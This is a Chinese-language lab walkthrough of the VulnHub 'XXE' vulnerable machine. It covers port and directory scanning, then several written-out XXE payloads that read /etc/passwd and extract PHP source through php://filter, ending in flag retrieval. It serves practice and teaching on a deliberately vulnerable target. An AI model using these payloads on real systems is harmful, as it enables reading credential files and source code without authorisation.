仅供个人娱乐
靶机信息
靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip
一、主机探测
二、端口服务识别
nmap -sV 192.168.181.149
存在web端口 打开web界面
三、漏洞查找和利用
扫描目录
dirb http://192.168.181.149
打开网页
打开目录
使用burp抓包
(个人)网络问题 靶机 ip改为 192.168.204.130
打开网络http://192.168.204.130/xxe/ 进行抓包
发现xxe文件
或者查看源码
修改xxe格式读取密码
<?xml version="1.0" encoding="UTF-8"?> #防止乱码
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd"> #读取密码文件
]>
<root><name>&admin;</name><password>1</password></root>
发现可以抓取密码
原来admin.php页面和源码为
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>1</password></root>
发现admin.php页面源码
返回包进行了加密 使用在线解密
将密码进行cmd5解密
进行登录 登录失败
点击flag
查看源码没有东西
继续寻找有用信息
查看源码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">
]>
<root><name>&admin;</name><password>1</password></root>
复制base64解码
使用各种方式 解密 最后 base32密码解密
使用base64解密
抓包修改参数flag.php 出现乱码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/.flag.php">
]>
<root><name>&admin;</name><password>1</password></root>
查看源码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>1</password></root>
使用base64解码 失败
最终使用phpstudy,开启错误显示,本地访问这个webshell得到了flag